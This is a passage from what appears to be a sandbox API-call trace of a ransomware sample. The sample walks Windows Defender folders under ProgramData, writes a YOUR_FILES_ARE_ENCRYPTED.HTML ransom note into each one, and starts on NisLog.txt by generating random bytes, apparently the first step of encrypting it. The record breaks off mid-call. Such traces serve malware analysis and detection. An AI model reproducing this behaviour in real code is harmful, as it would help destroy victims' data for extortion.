dwReserved1=0x640128, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0107.403] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd525f5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="..", cAlternateFileName="")) returned 1 [0107.403] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd525f5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="..", cAlternateFileName="")) returned 0 [0107.403] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0107.403] wnsprintfW (in: pszDest=0x692360, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\NisBackup\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0107.403] GetProcessHeap () returned 0x600000 [0107.403] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6f19f0 [0107.403] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\NisBackup\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\nisbackup\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0107.404] WriteFile (in: hFile=0x310, lpBuffer=0x6f19f0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x6f19f0*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0107.405] CloseHandle (hObject=0x310) returned 1 [0107.405] GetProcessHeap () returned 0x600000 [0107.405] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6f19f0 | out: hHeap=0x600000) returned 1 [0107.405] GetProcessHeap () returned 0x600000 [0107.405] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x692360 | out: hHeap=0x600000) returned 1 [0107.406] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd525f5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c210, dwReserved1=0x2297b0b, cFileName="Updates", cAlternateFileName="")) returned 1 [0107.406] StrStrIW (lpFirst="Updates", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.406] wnsprintfW (in: pszDest=0x682358, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Updates") returned 72 [0107.406] GetProcessHeap () returned 0x600000 [0107.406] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x692360 [0107.407] lstrcpyW (in: lpString1=0x692360, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Updates" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Updates") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Updates" [0107.407] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Updates", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\*" [0107.407] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd525f5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0107.407] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd525f5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="..", cAlternateFileName="")) returned 1 [0107.407] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd525f5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="..", cAlternateFileName="")) returned 0 [0107.407] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0107.407] wnsprintfW (in: pszDest=0x692360, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 102 [0107.407] GetProcessHeap () returned 0x600000 [0107.407] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6f19f0 [0107.408] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\updates\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0107.408] WriteFile (in: hFile=0x310, lpBuffer=0x6f19f0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x6f19f0*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0107.409] CloseHandle (hObject=0x310) returned 1 [0107.410] GetProcessHeap () returned 0x600000 [0107.410] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6f19f0 | out: hHeap=0x600000) returned 1 [0107.420] GetProcessHeap () returned 0x600000 [0107.421] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x692360 | out: hHeap=0x600000) returned 1 [0107.421] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd525f5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c210, dwReserved1=0x2297b0b, cFileName="Updates", cAlternateFileName="")) returned 0 [0107.422] FindClose (in: hFindFile=0x6268f8 | out: hFindFile=0x6268f8) returned 1 [0107.422] wnsprintfW (in: pszDest=0x682358, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 94 [0107.422] GetProcessHeap () returned 0x600000 [0107.422] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6f19f0 [0107.422] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0107.424] WriteFile (in: hFile=0x31c, lpBuffer=0x6f19f0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x6f19f0*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0107.425] CloseHandle (hObject=0x31c) returned 1 [0107.425] GetProcessHeap () returned 0x600000 [0107.425] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6f19f0 | out: hHeap=0x600000) returned 1 [0107.425] GetProcessHeap () returned 0x600000 [0107.425] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x682358 | out: hHeap=0x600000) returned 1 [0107.427] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd525f5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="Features", cAlternateFileName="")) returned 1 [0107.427] StrStrIW (lpFirst="Features", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.427] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Features") returned 54 [0107.427] GetProcessHeap () returned 0x600000 [0107.427] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0107.428] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Features" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Features") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Features" [0107.428] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Features", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Features\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Features\\*" [0107.428] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Features\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd525f5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c210, dwReserved1=0x2297b0b, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0107.429] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd525f5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c210, dwReserved1=0x2297b0b, cFileName="..", cAlternateFileName="")) returned 1 [0107.429] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd525f5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c210, dwReserved1=0x2297b0b, cFileName="..", cAlternateFileName="")) returned 0 [0107.429] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0107.429] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Features\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 84 [0107.429] GetProcessHeap () returned 0x600000 [0107.429] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6f19f0 [0107.429] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Features\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\features\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0107.430] WriteFile (in: hFile=0x31c, lpBuffer=0x6f19f0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x6f19f0*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0107.431] CloseHandle (hObject=0x31c) returned 1 [0107.431] GetProcessHeap () returned 0x600000 [0107.431] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6f19f0 | out: hHeap=0x600000) returned 1 [0107.431] GetProcessHeap () returned 0x600000 [0107.431] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0107.432] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd525f5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="LocalCopy", cAlternateFileName="LOCALC~1")) returned 1 [0107.432] StrStrIW (lpFirst="LocalCopy", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.432] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\LocalCopy") returned 55 [0107.432] GetProcessHeap () returned 0x600000 [0107.432] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0107.433] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\LocalCopy" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\LocalCopy") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\LocalCopy" [0107.433] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\LocalCopy", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\LocalCopy\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\LocalCopy\\*" [0107.433] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\LocalCopy\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd525f5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c210, dwReserved1=0x2297b0b, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0107.433] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd525f5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c210, dwReserved1=0x2297b0b, cFileName="..", cAlternateFileName="")) returned 1 [0107.433] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd525f5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c210, dwReserved1=0x2297b0b, cFileName="..", cAlternateFileName="")) returned 0 [0107.434] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0107.434] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\LocalCopy\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 85 [0107.434] GetProcessHeap () returned 0x600000 [0107.434] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6f19f0 [0107.434] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\LocalCopy\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\localcopy\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0107.435] WriteFile (in: hFile=0x31c, lpBuffer=0x6f19f0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x6f19f0*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0107.436] CloseHandle (hObject=0x31c) returned 1 [0107.436] GetProcessHeap () returned 0x600000 [0107.436] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6f19f0 | out: hHeap=0x600000) returned 1 [0107.436] GetProcessHeap () returned 0x600000 [0107.436] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0107.437] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd525f5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="Network Inspection System", cAlternateFileName="NETWOR~1")) returned 1 [0107.437] StrStrIW (lpFirst="Network Inspection System", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.437] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Network Inspection System") returned 71 [0107.437] GetProcessHeap () returned 0x600000 [0107.437] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0107.439] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Network Inspection System" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Network Inspection System") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Network Inspection System" [0107.439] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Network Inspection System", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Network Inspection System\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Network Inspection System\\*" [0107.439] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Network Inspection System\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd525f5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c210, dwReserved1=0x2297b0b, cFileName=".", cAlternateFileName="")) returned 0x626778 [0107.439] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd525f5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c210, dwReserved1=0x2297b0b, cFileName="..", cAlternateFileName="")) returned 1 [0107.439] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd525f5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c210, dwReserved1=0x2297b0b, cFileName="Support", cAlternateFileName="")) returned 1 [0107.439] StrStrIW (lpFirst="Support", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.439] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Network Inspection System\\Support") returned 79 [0107.439] GetProcessHeap () returned 0x600000 [0107.439] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0107.440] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Network Inspection System\\Support" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Network Inspection System\\Support") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Network Inspection System\\Support" [0107.440] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Network Inspection System\\Support", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Network Inspection System\\Support\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Network Inspection System\\Support\\*" [0107.440] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Network Inspection System\\Support\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xf926e663, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x631218, dwReserved1=0x631188, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0107.440] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xf926e663, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x631218, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 1 [0107.440] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf926e663, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf926e663, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x3ae0e073, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x64b7, dwReserved0=0x631218, dwReserved1=0x631188, cFileName="NisLog.txt", cAlternateFileName="")) returned 1 [0107.440] StrStrIW (lpFirst="NisLog.txt", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.441] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Network Inspection System\\Support\\NisLog.txt") returned 90 [0107.441] PathFindExtensionW (pszPath="NisLog.txt") returned=".txt" [0107.441] lstrlenW (lpString=".txt") returned 4 [0107.441] PathFindExtensionW (pszPath="NisLog.txt") returned=".txt" [0107.441] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0107.441] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Network Inspection System\\Support\\NisLog.txt" (normalized: "c:\\programdata\\microsoft\\windows defender\\network inspection system\\support\\nislog.txt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x314 [0107.441] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=25783) returned 1 [0107.441] GetProcessHeap () returned 0x600000 [0107.442] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x6b47b0 [0107.444] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="B8") returned 2 [0107.444] wsprintfW (in: 